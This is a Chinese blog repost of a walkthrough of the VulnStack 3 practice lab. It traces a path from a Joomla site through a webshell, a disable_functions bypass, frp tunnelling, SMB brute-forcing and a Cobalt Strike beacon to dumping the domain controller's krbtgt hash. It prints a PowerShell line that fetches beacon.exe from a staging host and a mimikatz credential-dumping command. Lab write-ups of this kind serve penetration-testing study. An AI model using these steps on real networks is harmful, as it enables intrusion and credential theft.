紅日ATT&CK VulnStack靶場(三)

網絡拓撲

在這里插入圖片描述

web階段

1.掃描DMZ機器端口

在這里插入圖片描述
2.進行ssh和3306爆破無果后訪問web服務

在這里插入圖片描述
3.已知目標是Joomla,掃描目錄

在這里插入圖片描述
4.有用的目錄分別為1.php

在這里插入圖片描述
5.configuration.php~中泄露了數據庫密碼

在這里插入圖片描述
6.administrator為后臺登錄地址

在這里插入圖片描述
7.直接連接mysql

在這里插入圖片描述
8.找到管理員表,密碼加密了

在這里插入圖片描述
9.百度joomla密碼的加密方式以及重置方式,用下面的方式添加新的管理員用戶
https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn

在這里插入圖片描述
10.重置密碼后登錄后臺

在這里插入圖片描述
11.搜索相關漏洞,用這個后臺RCE

在這里插入圖片描述在這里插入圖片描述
12.訪問后并沒有回顯

在這里插入圖片描述
13.查看exp是怎么寫的,看著沒什么問題,不知道為什么不顯示

在這里插入圖片描述
14.修改一下直接寫一個一句話馬

在這里插入圖片描述
15.修改一下直接寫一個一句話馬

在這里插入圖片描述
16.連接上蟻劍,進入命令行發現不能執行

在這里插入圖片描述
17.這里看網上說是被disable_function限制了,在之前的phpinfo的信息中也可以看到disable_function

disable_function就是在web服務中禁止執行一些高危函數,像一般的webshell管理工具就是默認用exec、system這種php函數來執行系統命令的,然而在此處就被disable_function限制了

在這里插入圖片描述
18.使用蟻劍的插件進行繞過

在這里插入圖片描述
19.成功執行命令

在這里插入圖片描述

內網

1.這里看了一下ip,發現只有一個內網ip并沒有公網ip,之前那個公網ip應該是一個負載均衡服務器使用了nginx反向代理

在這里插入圖片描述
2.翻出來的賬號密碼

在這里插入圖片描述

3.通過此賬號密碼登錄公網服務器,也就是那臺負載的ssh

在這里插入圖片描述
4.上傳fscan大致掃描一下內網

在這里插入圖片描述
在這里插入圖片描述
5.搭建frp做內網穿透
服務端
在這里插入圖片描述客戶端
在這里插入圖片描述
6.因為之前fscan看到192.168.93.20開啟了80端口,所以這里掃描一下

在這里插入圖片描述
7.發現是一個sqlserver的什么登錄框

在這里插入圖片描述
8.嘗試對sqlserver進行爆破但是無果

在這里插入圖片描述
9.對SMB進行爆破,這里爆破成功

在這里插入圖片描述
10.通過wmiexec進行連接

在這里插入圖片描述
11.連接成功后查看一下大致的信息,判斷是否可出網

在這里插入圖片描述

12.連接成功后查看一下大致的信息,判斷是否可出網

在這里插入圖片描述
13.因為目標不可出網,所以這里打算使用cs的正向代理木馬去控制目標主機

之前搭建了內網隧道,現在我本地的機器可以訪問192.168.93這個網段,所以說要通過正向代理讓192.168.93.20這個機器上線cs的話可以先讓本地機器上線,或者也可以讓192.168.93.100那臺ubantu上線去正向連接192.168.93.20,因為cs生成linux的木馬要用插件所以這里直接就讓我本地的機器上線了,再通過隧道去正向連接192.168.93.20受害機器

在這里插入圖片描述
14.創建正向監聽

在這里插入圖片描述

15.創建木馬綁定這個正向監聽器

在這里插入圖片描述
在這里插入圖片描述
16.將因為192.168.93.20這個機器不出網,所以把木馬上傳到192.168.93.100這臺ubantu上,開啟http服務

在這里插入圖片描述在這里插入圖片描述
17.這邊192.168.93.20使用wmiexe創建的會話用過powershell去下載192.168.93.100上的木馬

powershell (new-object Net.WebClient).DownloadFile('http://192.168.93.100:8888/beacon.exe','C:\beacon.exe')

在這里插入圖片描述
18.下載成功后執行,進行監聽

在這里插入圖片描述

19.這里使用我本地機器會話的beacon去直接連接正向代理木馬

在這里插入圖片描述

20.機器192.168.93.20成功上線

在這里插入圖片描述
21.這里想直接使用mimikatz抓取密碼,但是不知道為什么執行出錯了

在這里插入圖片描述在這里插入圖片描述
22.使用cs將本地的mimikatz上傳到192.168.93.20這臺機器上

在這里插入圖片描述
23.運行mimikatz抓取本地密碼并將結果保存

mimikazi.exe log privilege::debug sekurlsa::logonpasswords

在這里插入圖片描述
在這里插入圖片描述
24.對運行的結果進行下載

在這里插入圖片描述
25.這里可以看到抓取到了WIN-8GA56TNV3MV這臺機器的管理員用戶密碼

在這里插入圖片描述

26.對比一下之前fscan掃描的結果,這臺機器的ip是192.168.93.10,并且這臺機器是域控

在這里插入圖片描述

27.直接通過psexec明文密碼去連接,成功獲取到會話

在這里插入圖片描述
28.繼續在192.168.93.100啟動web

在這里插入圖片描述
29.這里我想讓它和之前的機器一樣直接正向連接上線cs,但是不知道為什么一直不成功

在這里插入圖片描述
30.既然上線不了cs那就直接通過powershell下載mimikatz到本地吧

在這里插入圖片描述
31.既然這臺機器是域控,那肯定要抓krbtgt的hash

在這里插入圖片描述
32.整個過程成功拿下了域控并抓了krbtgt的hash,此時還有一個192.168.93.30機器沒有上線,接下來的話就是做黃金票據然后登錄這臺機器了,這里就不做演示了

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/36910.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/36910.shtml
英文地址,請注明出處:http://en.pswp.cn/news/36910.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

提高學生學習效率的模擬考試系統

在如今競爭激烈的社會環境下,提高學生的學習效率顯得尤為重要。為了幫助學生評估自己的學習水平并提供有針對性的學習建議,開發一款模擬考試系統是非常必要的。 一、學生信息錄入 模擬考試系統首先需要學生信息錄入功能。學生可以通過一個簡單的表單填…

Unity游戲源碼分享-中國象棋Unity5.6版本

Unity游戲源碼分享-中國象棋Unity5.6版本 項目地址: https://download.csdn.net/download/Highning0007/88215699

【c語言】指針進階(超詳細)

文章目錄 ? 指向函數指針數組的指針📌指向函數指針數組的指針的定義📌指向函數指針數組的數組指針的使用 ?回調函數📌 回調函數的定義📌 回調函數的使用 ?qsort函數📌 qsort函數的作用📌qsort函數的定義…

【佳佳怪文獻分享】安全人機交互的學習責任分配與自動駕駛應用

標題:Learning Responsibility Allocations for Safe Human-Robot Interaction with Applications to Autonomous Driving 作者:Ryan K. Cosner, Yuxiao Chen, Karen Leung, and Marco Pavone 來源:2023 IEEE International Conference on …

1.1 : DNA 螺旋

概述 脫氧核糖核酸(DNA)是負責在所有生物體和大多數病毒中代代相傳性狀的遺傳物質。DNA由兩條相互纏繞形成雙螺旋的核苷酸鏈組成。DNA 結構的發現是在近一個世紀的時間里逐步發現的,代表了科學史上最著名、最迷人的故事之一。 DNA 結構詳細信息 每條 DNA 鏈均由稱為核苷酸…

安全防御問題

SSL VPN的實現,防火墻需要放行哪些流量? 實現 SSL VPN 時,在防火墻上需要放行以下流量, SSL/TLS 流量:SSL VPN 通過加密通信來確保安全性,因此防火墻需要允許 SSL/TLS 流量通過。一般情況下,SSL…

lua實現http的異步回調

想用lua實現與http服務器的通信,請求一些數據會回來,默認lua.socket.http是同步的,所以想弄一個異步的方式 測試環境 lua 5.1 同步 以下是同步的代碼,其中http.request會被阻塞住的 local function send_request()local res,…

【QT】 Word模板編輯、轉PDF格式

很高興在雪易的CSDN遇見你 ,給你糖糖 歡迎大家加入雪易社區-CSDN社區云 前言 本文分享基于QT進行Word模板編輯以及Word轉PDF的技術,希望對各位小伙伴有所幫助! 感謝各位小伙伴的點贊+關注,小易會繼續努力分享,一起進步! 你的點贊就是我的動力(^U^)ノ~YO 目錄 …

機器學習-特征選擇:如何使用遞歸特征消除算法自動篩選出最優特征?

一、引言 在實際應用中,特征選擇作為機器學習和數據挖掘領域的重要環節,對于提高模型性能和減少計算開銷具有關鍵影響。特征選擇是從原始特征集中選擇最相關和最具區分力的特征子集,以提高模型的泛化能力和可解釋性。 特征選擇在實踐中具有以…

計算機競賽 python opencv 深度學習 指紋識別算法實現

1 前言 🔥 優質競賽項目系列,今天要分享的是 🚩 python opencv 深度學習 指紋識別算法實現 🥇學長這里給一個題目綜合評分(每項滿分5分) 難度系數:3分工作量:4分創新點:4分 該項目較為新穎…

什么是Java中的觀察者模式?

Java中的觀察者模式是一種設計模式,它允許一個對象在狀態發生改變時通知它的所有觀察者。這種模式在許多情況下都非常有用,例如在用戶界面中,當用戶與界面交互時,可能需要通知其他對象。 下面是一個簡單的Java代碼示例&#xff0…

代碼質量檢查工具SonarQube

Devops流水線之SonarQube 文章目錄 Devops流水線之SonarQube1. 軟件功能介紹及用途2. 軟件環境搭建與使用2.1 使用方法2.2 SonarQube相關屬性說明2.3 Sonar配置文件內容說明 3. 使用環節4. 檢查方法 1. 軟件功能介紹及用途 SonarQube是一個用于代碼質量管理的開源平臺&#xf…

element-ui table表格,根據縮放自適應

安裝依賴 npm install af-table-columnmain.js 中引入依賴, import Vue from vue import ElementUI from element-ui //需要按需引入,先引入vue并引入element-ui import AFTableColumn from af-table-column Vue.use(AFTableColumn)demo樣式&#xff1…

Python Opencv實踐 - 圖像放射變換

import cv2 as cv import numpy as np import matplotlib.pyplot as pltimg cv.imread("../SampleImages/pomeranian.png", cv.IMREAD_COLOR) rows,cols img.shape[:2] print(img.shape[:2])#使用getAffineTransform來獲得仿射變換的矩陣M #cv.getAffineTransform(…

Java:正則表達式案例:爬數據,重復數據替換,數據分割

使用正則表達式查找一段文本中的內容 需求:請把下面文本中的電話,郵箱,座機號碼,熱線都爬取出來。 String data "電話:1866668888,18699997777\n" "或者聯系郵箱: boniuitcast.cn,\n" "座機…

Loop Transformations

Java的Loop Transformations 很多人都知道,在編程中,循環結構是十分重要的。但是,在不同的情況下,相同的循環結構可能會導致不同的性能表現。因此,在優化程序的性能時,循環結構的優化是一個不可忽略的方面。這就是Loop Transformations(循環轉換)的作用。本文將以詳細…

16 dplsys GAN

和有監督的分類工作不同,生成任務的目標更不明確。難以評價生成結果的好壞。 Oracle discriminator 假設我們有一個先知判別器oracle discriminator可以分辨我們生成的內容是真還是假。 我們想讓生產成的結果足夠真實,所以要 fool Oracle discriminato…

Android布局【GridLayout】

文章目錄 GridLayout概述常見屬性子控件屬性項目結構主要代碼 GridLayout概述 GridLayout也名網格布局,該布局與TableLayout類似,但與其相比,GridLayout會更加的靈活,比如 TableLayout不能將兩行進行一個合并,只能將兩列進行一個…

Declare 關鍵字在 TypeScript 中如何正確使用?

如果您編寫 TypeScript 代碼的時間足夠長,您就已經看到過declare關鍵字。但它有什么作用,為什么要使用它? declare關鍵字告訴 TypeScript 編譯器存在一個對象并且可以在代碼中使用。 本文解釋了聲明關鍵字并通過代碼示例展示了不同的用例。 定義 在 TypeScript 中,decl…

【MySQL--->數據類型】

文章目錄 [TOC](文章目錄) 一、數據類型分類二、整型類型三、bit(位)類型四、float類型五、decimal類型六、char和varchar類型1.char類型2.varchar3.char與varchar的區別 七、日期與時間類型八、enum和set 一、數據類型分類 二、整型類型 數值類型有數據存儲上限,而且每個類型都…